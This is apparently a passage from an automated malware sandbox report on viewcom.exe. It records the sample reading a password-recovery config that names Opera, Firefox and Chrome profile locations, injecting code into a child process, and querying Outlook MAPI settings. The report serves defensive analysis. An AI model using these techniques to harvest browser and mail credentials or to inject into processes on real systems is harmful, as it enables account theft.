Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = UseOperaPasswordFile, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = FirefoxProfileFolder	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = FirefoxInstallFolder	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = ChromeProfileFolder	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = OperaPasswordFile	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = SaveFileEncoeding, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = WinPos	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = Columns	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = Sort, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = Path, data_out = Profiles/zcf30c9i.default	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = IsRelative, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile1, key_name = Path	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile1, key_name = IsRelative, default_value = 0	1	Fn

Process #10: viewcom.exe

(Host: 48, Network: 0)

Information	Value
ID	#10
File Name	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe
Command Line	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:01:19, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:15

OS Process Information

Information	Value
PID	0xc80
Parent PID	0xb98 (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C84

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00140000	0x001a6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001b0000	0x001b0000	0x002affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002b0000	0x002b0000	0x0031ffff	Private Memory	Readable, Writable	Region Actions Download Dump
imm32.dll	0x002b0000	0x002ccfff	Memory Mapped File	Readable	Region Actions
private_0x00000000002b0000	0x002b0000	0x002b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000002c0000	0x002c0000	0x002c1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000002d0000	0x002d0000	0x002d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002e0000	0x002e0000	0x002e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
windowsshell.manifest	0x002f0000	0x002f0fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000002f0000	0x002f0000	0x002f6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000300000	0x00300000	0x00301fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000310000	0x00310000	0x0031ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000320000	0x00320000	0x003e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000400000	0x00400000	0x00418fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000420000	0x00420000	0x00520fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000530000	0x00530000	0x0112ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01130000	0x013fefff	Memory Mapped File	Readable	Region Actions
private_0x0000000001400000	0x01400000	0x0151ffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll.mui	0x01400000	0x014bffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x00000000014c0000	0x014c0000	0x014c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000014e0000	0x014e0000	0x0151ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001520000	0x01520000	0x01912fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001920000	0x01920000	0x01b1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001920000	0x01920000	0x019affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000019b0000	0x019b0000	0x01a8efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ae0000	0x01ae0000	0x01b1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
staticcache.dat	0x01b20000	0x0244ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000002450000	0x02450000	0x024cffff	Private Memory	Readable, Writable	Region Actions Download Dump
olmapi32.dll	0x5f3c0000	0x5f846fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp140.dll	0x6b2e0000	0x6b34bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-utility-l1-1-0.dll	0x6b720000	0x6b722fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-environment-l1-1-0.dll	0x6b730000	0x6b732fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-filesystem-l1-1-0.dll	0x6b740000	0x6b742fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-time-l1-1-0.dll	0x6b750000	0x6b752fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-multibyte-l1-1-0.dll	0x6b760000	0x6b764fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-math-l1-1-0.dll	0x6b770000	0x6b774fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-locale-l1-1-0.dll	0x6d460000	0x6d462fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-convert-l1-1-0.dll	0x6d4a0000	0x6d4a3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-stdio-l1-1-0.dll	0x6d4b0000	0x6d4b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-heap-l1-1-0.dll	0x6d4c0000	0x6d4c2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-string-l1-1-0.dll	0x6d4d0000	0x6d4d3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-crt-runtime-l1-1-0.dll	0x6d4e0000	0x6d4e3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vcruntime140.dll	0x6d4f0000	0x6d503fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-file-l1-2-0.dll	0x6f2c0000	0x6f2c2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-processthreads-l1-1-1.dll	0x6f2d0000	0x6f2d2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-localization-l1-2-0.dll	0x6f2e0000	0x6f2e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-file-l2-1-0.dll	0x6f2f0000	0x6f2f2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-timezone-l1-1-0.dll	0x6f300000	0x6f302fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ucrtbase.dll	0x6f310000	0x6f3ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-synch-l1-2-0.dll	0x6f5a0000	0x6f5a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x73a00000	0x73a12fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdiplus.dll	0x73b60000	0x73ceffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73cf0000	0x73d2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x741a0000	0x741acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x746f0000	0x7488dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75660000	0x7566bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x764f0000	0x77139fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xbb0	address = 0x400000, size = 102400	1	Fn Data
Modify Memory	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xbb0	address = 0x7ffda008, size = 4	1	Fn Data
Modify Control Flow	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xbb0	os_tid = 0xc84, address = 0x0	1	Fn

Host Behavior

File (3)

Operation	Filename	Count	Logfile
Open	STD_INPUT_HANDLE	1	Fn
Open	STD_OUTPUT_HANDLE	1	Fn
Open	STD_ERROR_HANDLE	1	Fn

Registry (3)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook	value_name = DLLPathEx, data = 67	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook	value_name = MSIApplicationLCID, data = 77	1	Fn

Module (40)

Operation	Module	Additional Information	Count	Logfile
Load	advapi32.dll	base_address = 0x76030000	1	Fn
Load	ole32.dll	base_address = 0x77460000	1	Fn
Load	shell32.dll	base_address = 0x764f0000	1	Fn
Load	C:\Program Files\Microsoft Office\Root\Office16\OLMAPI32.DLL	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76350000	1	Fn
Get Handle	mscoree.dll		1	Fn
Get Filename		process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsAlloc, address_out = 0x763a418d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsFree, address_out = 0x763a1f61	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsGetValue, address_out = 0x763a1e16	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsSetValue, address_out = 0x763a76e6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x763a3879	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateEventExW, address_out = 0x763524d8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76382111	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x76392510	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7638b009	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x775e89be	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x775dc02a	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x775dc0d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x76383f78	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadpoolWait, address_out = 0x775e8bfb	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x775db567	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77605998	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x775d2251	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x775d28f6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76382004	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x763d9aa9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x763df3cf	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CompareStringEx, address_out = 0x763aebc6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDateFormatEx, address_out = 0x763ef29f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x763853a5	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetTimeFormatEx, address_out = 0x763ef21a	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x763df70b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsValidLocaleName, address_out = 0x763df71b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LCMapStringEx, address_out = 0x763df72b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetTickCount64, address_out = 0x7638eb4e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-08-31 14:52:22 (UTC)		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String			1	Fn Data